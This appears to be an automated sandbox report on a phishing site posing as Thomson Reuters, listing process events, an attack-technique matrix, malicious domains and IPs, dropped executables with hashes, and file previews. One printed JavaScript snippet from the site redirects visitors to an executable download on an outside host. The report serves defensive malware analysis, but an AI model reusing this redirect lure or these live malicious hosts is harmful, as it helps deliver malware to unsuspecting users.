Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\a65f7ead-e20b-4cfe-81c9-5f7957509ceb.tmpJump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\Unconfirmed 562021.crdownloadJump to dropped file
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
11
Masquerading
OS Credential Dumping1
System Information Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Extra Window Memory Injection
1
Rundll32
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
File Deletion
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Extra Window Memory Injection
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://tax.thomson-reuterfiles.com/0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/_app-1e66c022522ffc96.js0%Avira URL Cloudsafe
https://tax.thomson-reuterfiles.com/_next/static/chunks/framework-0c7baedefba6b077.js0%Avira URL Cloudsafe
https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_buildManifest.js0%Avira URL Cloudsafe
https://tax.thomson-reuterfiles.com/_next/static/css/6c5712a607796dcd.css0%Avira URL Cloudsafe
https://tax.thomson-reuterfiles.com/_next/static/chunks/main-49b0a41ec78c7394.js0%Avira URL Cloudsafe
https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/index-899e26e961b4ef93.js0%Avira URL Cloudsafe
https://tax.thomson-reuterfiles.com/_next/static/chunks/webpack-2555a4296ab7a1b2.js0%Avira URL Cloudsafe
https://tax.thomson-reuterfiles.com/_next/static/chunks/849-a4a13dffe91c49e7.js0%Avira URL Cloudsafe
https://down.tradingviewdownload.top/files/images/Logo.png0%Avira URL Cloudsafe
https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_ssgManifest.js0%Avira URL Cloudsafe
https://tax.thomson-reuterfiles.com/_next/static/media/search-background-desktop.a9bd8cdc.png0%Avira URL Cloudsafe
https://app-data.gcs.trstatic.net/wel-trdotcom/fonts/all-characters/knowledge2017-medium-webfont.woff20%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
google.com
142.251.40.142
truefalse
    high
    d22lao95g8jow9.cloudfront.net
    18.238.55.96
    truefalse
      unknown
      tax.thomson-reuterfiles.com
      185.241.61.45
      truefalse
        high
        www.google.com
        142.251.32.100
        truefalse
          high
          down.tradingviewdownload.top
          194.163.44.11
          truetrue
            unknown
            app-data.gcs.trstatic.net
            unknown
            unknownfalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/index-899e26e961b4ef93.jstrue
              • Avira URL Cloud: safe
              unknown
              https://tax.thomson-reuterfiles.com/_next/static/chunks/main-49b0a41ec78c7394.jstrue
              • Avira URL Cloud: safe
              unknown
              https://tax.thomson-reuterfiles.com/_next/static/chunks/849-a4a13dffe91c49e7.jstrue
              • Avira URL Cloud: safe
              unknown
              https://tax.thomson-reuterfiles.com/_next/static/chunks/webpack-2555a4296ab7a1b2.jstrue
              • Avira URL Cloud: safe
              unknown
              https://down.tradingviewdownload.top/files/images/Logo.pngfalse
              • Avira URL Cloud: safe
              unknown
              https://tax.thomson-reuterfiles.com/_next/static/css/6c5712a607796dcd.csstrue
              • Avira URL Cloud: safe
              unknown
              https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_buildManifest.jstrue
              • Avira URL Cloud: safe
              unknown
              https://tax.thomson-reuterfiles.com/_next/static/media/search-background-desktop.a9bd8cdc.pngtrue
              • Avira URL Cloud: safe
              unknown
              https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/_app-1e66c022522ffc96.jstrue
              • Avira URL Cloud: safe
              unknown
              https://app-data.gcs.trstatic.net/wel-trdotcom/fonts/all-characters/knowledge2017-medium-webfont.woff2false
              • Avira URL Cloud: safe
              unknown
              https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_ssgManifest.jstrue
              • Avira URL Cloud: safe
              unknown
              https://tax.thomson-reuterfiles.com/true
                unknown
                https://tax.thomson-reuterfiles.com/_next/static/chunks/framework-0c7baedefba6b077.jstrue
                • Avira URL Cloud: safe
                unknown
                https://down.tradingviewdownload.top/dw.phptrue
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  64.233.180.84
                  unknownUnited States
                  15169GOOGLEUSfalse
                  1.1.1.1
                  unknownAustralia
                  13335CLOUDFLARENETUSfalse
                  185.241.61.45
                  tax.thomson-reuterfiles.comunknown
                  204476ULX-UKGBfalse
                  142.250.80.110
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.250.176.202
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.251.40.227
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.251.32.99
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.251.40.131
                  unknownUnited States
                  15169GOOGLEUSfalse
                  8.8.8.8
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.250.65.238
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.251.32.110
                  unknownUnited States
                  15169GOOGLEUSfalse
                  142.251.32.100
                  www.google.comUnited States
                  15169GOOGLEUSfalse
                  18.238.55.96
                  d22lao95g8jow9.cloudfront.netUnited States
                  16509AMAZON-02USfalse
                  194.163.44.11
                  down.tradingviewdownload.topGermany
                  6659NEXINTO-DEtrue
                  142.251.35.163
                  unknownUnited States
                  15169GOOGLEUSfalse
                  IP
                  192.168.2.24
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1647531
                  Start date and time:2025-03-24 23:25:33 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                  Sample URL:https://tax.thomson-reuterfiles.com/
                  Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                  Run name:Potential for more IOCs and behavior
                  Number of analysed new started processes analysed:21
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • EGA enabled
                  Analysis Mode:stream
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal52.phis.win@30/19@23/150
                  • Exclude process from analysis (whitelisted): dllhost.exe
                  • Excluded IPs from analysis (whitelisted): 104.18.38.233, 172.64.149.23
                  • Excluded domains from analysis (whitelisted): crt.comodoca.com.cdn.cloudflare.net, crt.comodoca.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: https://tax.thomson-reuterfiles.com/
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):1536
                  Entropy (8bit):1.2751541137543159
                  Encrypted:false
                  SSDEEP:
                  MD5:144FB7197B41C3CCC5DD71646E029F3A
                  SHA1:AD3401ACD1E8155B59D82024D2FA5C51368343BC
                  SHA-256:B1206A178E400750828BFEA3ABB6850E662C1B7310AE61488AAA41D07E757652
                  SHA-512:3DF2E7D138C633F2EF28B0752631B05CA992667772A70CCFBFE8D4566D18E437B9457DC4E3AD198FF15AB429CAFC416B39EF2C4BEB9C4347DD8FDB9EB6233F23
                  Malicious:false
                  Reputation:unknown
                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):0
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:
                  MD5:BA222AD5AFF9A6C4C854D89F59C84D52
                  SHA1:FB4B3461554849B79E60C5A227E9B652E15E5F9E
                  SHA-256:2A79CE303DF4FDECE161FF1E7A5D56FF613FD4521B1F6A0914BA6A7A8394981E
                  SHA-512:84FDCFFD865C69F36DFF8C27ACB5A696CC67E419EFDDA04D3C9B307E59B3B27F302799E26D03B7095578F617C5AAB3F43501256B95808FFDDBBD5274358DC0FF
                  Malicious:false
                  Reputation:unknown
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d......n.............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L......g...............'..........................@..........................P............@.....................................<....0...................-...@......8...p...........................x...@...............<............................text............................... ..`.rdata..X].......^..................@..@.data...............................@....rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):83360
                  Entropy (8bit):6.51284712717126
                  Encrypted:false
                  SSDEEP:
                  MD5:BA222AD5AFF9A6C4C854D89F59C84D52
                  SHA1:FB4B3461554849B79E60C5A227E9B652E15E5F9E
                  SHA-256:2A79CE303DF4FDECE161FF1E7A5D56FF613FD4521B1F6A0914BA6A7A8394981E
                  SHA-512:84FDCFFD865C69F36DFF8C27ACB5A696CC67E419EFDDA04D3C9B307E59B3B27F302799E26D03B7095578F617C5AAB3F43501256B95808FFDDBBD5274358DC0FF
                  Malicious:false
                  Reputation:unknown
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d......n.............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L......g...............'..........................@..........................P............@.....................................<....0...................-...@......8...p...........................x...@...............<............................text............................... ..`.rdata..X].......^..................@..@.data...............................@....rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):7751
                  Entropy (8bit):6.230964105718949
                  Encrypted:false
                  SSDEEP:
                  MD5:71051E702EF1925286D950CF7A3F00D4
                  SHA1:458F9323F7315F822011501A6E4CE1E22B1B7B76
                  SHA-256:7187E4503153448CF8503892E70ED1359E7EED72A040BB4457102A6E577A7DC3
                  SHA-512:C7F013F97D8091D4E737D3ACD773DA68CC5CFBD2DF50D245B3D3E8A71DE1A434D52000FCC80BD6BA66A68C9D677F6F541FBAF525361FA9AA52B900A1898AD5C3
                  Malicious:false
                  Reputation:unknown
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d......n.............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L......g...............'..........................@..........................P............@.....................................<....0...................-...@......8...p...........................x...@...............<............................text............................... ..`.rdata..X].......^..................@..@.data...............................@....rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (60667), with no line terminators
                  Category:downloaded
                  Size (bytes):60925
                  Entropy (8bit):5.221090580255161
                  Encrypted:false
                  SSDEEP:
                  MD5:28F2F56C3974CCB9FFA2913CF382BFC0
                  SHA1:7CDB9B252F4DA482716EE433F4D779661F77042A
                  SHA-256:351B7DF005DB3E41B0C212E6ECFFAC299DD0F2E911D81AEA685D3B02B2F95E63
                  SHA-512:5877813AA9B0BB1CD40EC8C30FFEF87D9D40BD2D260818DB025B1456DE0F0DA2C17BFD3DAD3D6E531587F05188A9D5BC92F5BEB89F5742B11EFB49436B5864EE
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/index-899e26e961b4ef93.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[405],{5728:function(s,c,e){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return e(7254)}])},7254:function(s,c,e){"use strict";e.r(c),e.d(c,{default:function(){return pages}});var t=e(5893),a=e(7294),l=e(6896),components_Popup=function(s){let{open:c,setOpen:e}=s,{locale:n}=(0,l.Z)(),[r,h]=(0,a.useState)(1);return(0,a.useEffect)(()=>{c&&(h(1),window.location.href="https://down.Deepseekdownload.top/dw/dw.php")},[c]),(0,t.jsxs)("div",{className:"fixed inset-0 z-[100] flex items-center justify-center px-4 transition-all duration-500 ".concat(c?"opacity-100 visible":"opacity-0 invisible"),children:[(0,t.jsx)("div",{onClick:()=>{e(!1)},className:"absolute inset-0 bg-black bg-opacity-50 backdrop-blur-sm",style:{opacity:1}}),(0,t.jsxs)("div",{className:"relative bg-[#060606] p-4 sm:p-6 rounded-2xl w-full max-w-[512px]",style:{opacity:1,transform:"none"},children:[(0,t.jsxs)("div",{className:"flex items-center justify-center p
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), TrueType, length 28740, version 1.0
                  Category:downloaded
                  Size (bytes):28740
                  Entropy (8bit):7.992640337554668
                  Encrypted:true
                  SSDEEP:
                  MD5:30164609C16364DE36B51BAF83BDEC4E
                  SHA1:FE93B8F82DC099CCA5E441FDEAF30FEA53202FB1
                  SHA-256:7A19A7027E125257D310C6DBD78AE3A30B5EA1E3794D60B12BB28227A003BFDA
                  SHA-512:A2F1B37730D209BC6E638E98BFF78EC294BE964A2B95308207EA84521409803523E11C62337A38CDB331A5E4FB58CB0171F139574C50B38414A5CD26325EE4EB
                  Malicious:false
                  Reputation:unknown
                  URL:https://fonts.gstatic.com/s/sourcesans3/v18/nwpStKy2OAdR1K-IwhWudF-R3w8aZQ.woff2
                  Preview:wOF2......pD..........o..........................F......n..6?HVAR.f?MVARF.`?STAT.*'*..Z/d.......S....0....6.$.... ..|..Q........:Z..m..7.z],..=8...~.....1....h....t.Xc......!&.e=2.0c..la.....D.VU{t.h.....80.."'F.Bu$>&...a."..s...{" #a..p..W.NA.5.rl..n...t...C6$H2...EzQ2.....c.G.k.iE..V.f......0.T.......2...#.M|..F....{..".m..1..".Ou...U..<Iyp.X.[0c`9.Q?..f..{//..J..K.!..c.4..)b..VD.H..Pj..H.Q.%.H-..RD....".H)bJ.....:~...8..:8....1..eY..Q.x,.<.eY.B.!.1.8,.7.q{c_..Wj.*.m.6N.....x.p.......h..7..L..Y$..W.?$.fR D..?...~.sQO..h$.W.DH.-1...@....Os.'..q.#.vw...n....5,..5`...X`&*..?.....T....~....Y?[Zw.-.4{... .$....l.@..n3..k......K..l."E...u...c].=.....8..};...s..v..EK.....c.!...!|B...C.y.Z/..2..c..8L.=...Z9."'...N.T..[kSj.8.....B..w......L..V.H/..F).............w...t.W..p...J......!..(=..#....B......m......c..!.--._...x.v.As...B.c6.f..A...i..? T\.Spc.."......EU.C....Z...t2...\....q...z.../.".l.B..b3A.............(..(.c.R..*...Y... -..%.x..OC^Z...<Y..3(G
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text
                  Category:downloaded
                  Size (bytes):315
                  Entropy (8bit):5.0572271090563765
                  Encrypted:false
                  SSDEEP:
                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                  Malicious:false
                  Reputation:unknown
                  URL:https://down.tradingviewdownload.top/files/images/Logo.png
                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):117898
                  Entropy (8bit):5.374105106842063
                  Encrypted:false
                  SSDEEP:
                  MD5:4E1FA4B25BB3E13122ADB6FC89B692A9
                  SHA1:62A57CC9D9D92E27254C8FCA63A7C217741FE0DC
                  SHA-256:BD3F95C00C05EFA6CD717A4B287146FF3148D9637EFAAFB7F697EA8EBB162017
                  SHA-512:40145E4843102AAF203EC6F9CCADA0D846A4CECAED2AFFF92C93FD6D070B83BF2E526F0038452A732A4AF1E9A37E694F1CA78695308014CE071F43AEB5D9C3C4
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/main-49b0a41ec78c7394.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{4878:function(r,n){"use strict";function getDeploymentIdQueryOrEmptyString(){return""}Object.defineProperty(n,"__esModule",{value:!0}),Object.defineProperty(n,"getDeploymentIdQueryOrEmptyString",{enumerable:!0,get:function(){return getDeploymentIdQueryOrEmptyString}})},37:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var r=/\((.*)\)/.exec(this.toString());return r?r[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(r,n){return n=this.concat.apply([],this),r>1&&n.some(Array.isArray)?n.flat(r-1):n},Array.prototype.flatMap=function(r,n){return this.map(r,n).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(r){if("function"!=typeof r)return
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):77
                  Entropy (8bit):4.37144473219773
                  Encrypted:false
                  SSDEEP:
                  MD5:B6652DF95DB52FEB4DAF4ECA35380933
                  SHA1:65451D110137761B318C82D9071C042DB80C4036
                  SHA-256:6F5B4AA00D2F8D6AED9935B471806BF7ACEF464D0C1D390260E5FE27F800C67E
                  SHA-512:3390C5663EF9081885DF8CDBC719F6C2F1597A4E25168529598097E9472608A4A62EC7F7E0BC400D22AAC81BF6EA926532886E4DC6E4E272D3B588490A090473
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_ssgManifest.js
                  Preview:self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (1476)
                  Category:downloaded
                  Size (bytes):3472
                  Entropy (8bit):5.1522869804082845
                  Encrypted:false
                  SSDEEP:
                  MD5:F309517DC333784216BE4FF5DEA5045C
                  SHA1:F2434DC4F60F3B892C062B84E463BFD2BF3B5679
                  SHA-256:FC06A24B94DBA08EF5DADAE7F769BBD17DC2ED115AD8614EBECDD86EF4E8BF87
                  SHA-512:FBBF64844F63F035A075C8B173708B9F2BF21E35C92EAD9ED9F6EAE359851ECA38BE90B0A311D81AF185A9E6200D77B3D60E54AB2AF68A6053D9ABACD2782136
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/
                  Preview:<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><meta name="next-head-count" content="2"/><meta name="google-site-verification" content="27wxy8zChhtA5aSjzVrIEj2ON_2R6X8iKBWg_iGK650"/><link rel="preload" href="/_next/static/css/6c5712a607796dcd.css" as="style" crossorigin=""/><link rel="stylesheet" href="/_next/static/css/6c5712a607796dcd.css" crossorigin="" data-n-g=""/><noscript data-n-css=""></noscript><script defer="" crossorigin="" nomodule="" src="/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js"></script><script src="/_next/static/chunks/webpack-2555a4296ab7a1b2.js" defer="" crossorigin=""></script><script src="/_next/static/chunks/framework-0c7baedefba6b077.js" defer="" crossorigin=""></script><script src="/_next/static/chunks/main-49b0a41ec78c7394.js" defer="" crossorigin=""></script><script src="/_next/static/chunks/pages/_app-1e66c022522ffc96.js" defer="" crossorigin=""></script><script src="/_next/static/chunk
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (1966), with no line terminators
                  Category:downloaded
                  Size (bytes):1966
                  Entropy (8bit):5.172480733240752
                  Encrypted:false
                  SSDEEP:
                  MD5:424CAF40614A148FC5159DE89A28E904
                  SHA1:86EA812BFBB08497B8102D8D65D949B5FBA4E742
                  SHA-256:8548F0E5D0AD9F008612807170927D4E3126C46496C184C05F0FB1CE4B728003
                  SHA-512:EA9CA9A7CE2961671FA958C06D2234766DEA994DFF0B0980215867DCCA66886F19AD4095BB734230241C706BDD42667DFE02573F415B48D9E437BF8CDD014A02
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/webpack-2555a4296ab7a1b2.js
                  Preview:!function(){"use strict";var e,r,_,n,t={},u={};function __webpack_require__(e){var r=u[e];if(void 0!==r)return r.exports;var _=u[e]={exports:{}},n=!0;try{t[e].call(_.exports,_,_.exports,__webpack_require__),n=!1}finally{n&&delete u[e]}return _.exports}__webpack_require__.m=t,e=[],__webpack_require__.O=function(r,_,n,t){if(_){t=t||0;for(var u=e.length;u>0&&e[u-1][2]>t;u--)e[u]=e[u-1];e[u]=[_,n,t];return}for(var i=1/0,u=0;u<e.length;u++){for(var _=e[u][0],n=e[u][1],t=e[u][2],o=!0,c=0;c<_.length;c++)i>=t&&Object.keys(__webpack_require__.O).every(function(e){return __webpack_require__.O[e](_[c])})?_.splice(c--,1):(o=!1,t<i&&(i=t));if(o){e.splice(u--,1);var a=n()}}return a},__webpack_require__.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return __webpack_require__.d(r,{a:r}),r},__webpack_require__.d=function(e,r){for(var _ in r)__webpack_require__.o(r,_)&&!__webpack_require__.o(e,_)&&Object.defineProperty(e,_,{enumerable:!0,get:r[_]})},__webpack_requ
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (470), with no line terminators
                  Category:downloaded
                  Size (bytes):470
                  Entropy (8bit):5.434697340185277
                  Encrypted:false
                  SSDEEP:
                  MD5:B46E5B6908337511AFAC3760D2E1E518
                  SHA1:D947F28C2EB370CA33E2182E36D7D7BCCBF31AD8
                  SHA-256:B06E69FA3D38C5D4428B915BA50061C4CDBDA9766870CE3BF3525226C43EABB2
                  SHA-512:2127A842815B996FF922418DDBD343FCA05DB0E56871938EA55456DDA7A91F412DBD9097389071CA9D0C1EB4744400ABACE931A706997D18FC0A375B26521F2A
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_buildManifest.js
                  Preview:self.__BUILD_MANIFEST={__rewrites:{afterFiles:[],beforeFiles:[],fallback:[]},"/":["static/chunks/849-a4a13dffe91c49e7.js","static/chunks/pages/index-899e26e961b4ef93.js"],"/404":["static/chunks/pages/404-7fda4da57b5079e3.js"],"/_error":["static/chunks/pages/_error-ee5b5fb91d29d86f.js"],"/sitemap.xml":["static/chunks/pages/sitemap.xml-66ac2aebe440de2a.js"],sortedPages:["/","/404","/_app","/_error","/sitemap.xml"]},self.__BUILD_MANIFEST_CB&&self.__BUILD_MANIFEST_CB();
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (3627), with no line terminators
                  Category:downloaded
                  Size (bytes):3627
                  Entropy (8bit):5.366412655772073
                  Encrypted:false
                  SSDEEP:
                  MD5:75FA40EDDBA53306AD2E634AD1BD5E5D
                  SHA1:F764E73DC771AB69130FAD742B93E45A5B0D368F
                  SHA-256:CC67D35B4F8D98C17C105961CC2F26D8C98457922DF87EE3FB8C08B165BBF097
                  SHA-512:00B2EE38A0DB465890A9B40DCAC8EF122774E32F47A8142D167A35A22FDF9E1FEDEEAF60C6415462A997D033DCD8DCB7818800E360CA1A41CD0A976B7C14F7CB
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/849-a4a13dffe91c49e7.js
                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[849],{7219:function(t,e,n){n.d(e,{XKb:function(){return FiLink},Imn:function(){return FiMail},IC0:function(){return FiMessageSquare},ViN:function(){return FiPrinter},jRj:function(){return FiSearch}});var r=n(7294),o={color:void 0,size:void 0,className:void 0,style:void 0,attr:void 0},i=r.createContext&&r.createContext(o),__assign=function(){return(__assign=Object.assign||function(t){for(var e,n=1,r=arguments.length;n<r;n++)for(var o in e=arguments[n])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t}).apply(this,arguments)},__rest=function(t,e){var n={};for(var r in t)Object.prototype.hasOwnProperty.call(t,r)&&0>e.indexOf(r)&&(n[r]=t[r]);if(null!=t&&"function"==typeof Object.getOwnPropertySymbols)for(var o=0,r=Object.getOwnPropertySymbols(t);o<r.length;o++)0>e.indexOf(r[o])&&Object.prototype.propertyIsEnumerable.call(t,r[o])&&(n[r[o]]=t[r[o]]);return n};function iconBase_GenIcon(t){return function(e){re
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):5118
                  Entropy (8bit):5.42635093571842
                  Encrypted:false
                  SSDEEP:
                  MD5:8283D5A5DEE609F59A5E2D8178FAC306
                  SHA1:33C121F2C64F6BE3535693EEDB43E39C44812FCC
                  SHA-256:EFE2A4309C2E2CF8B24023D7DDD9F65C50F7B2E187CB28C1BD68AC8FD1D88BC6
                  SHA-512:7757CC826335058EB94B682C740ADDABC0424E9A7490833387A8E107CE3DE08F8A7254C05DF6D82A50C4353DC2BE09CA3C34A1704E41B427CF642398E0E43AA0
                  Malicious:false
                  Reputation:unknown
                  URL:"https://fonts.googleapis.com/css2?family=Source+Sans+3:ital,wght@0,200..900;1,200..900&display=swap"
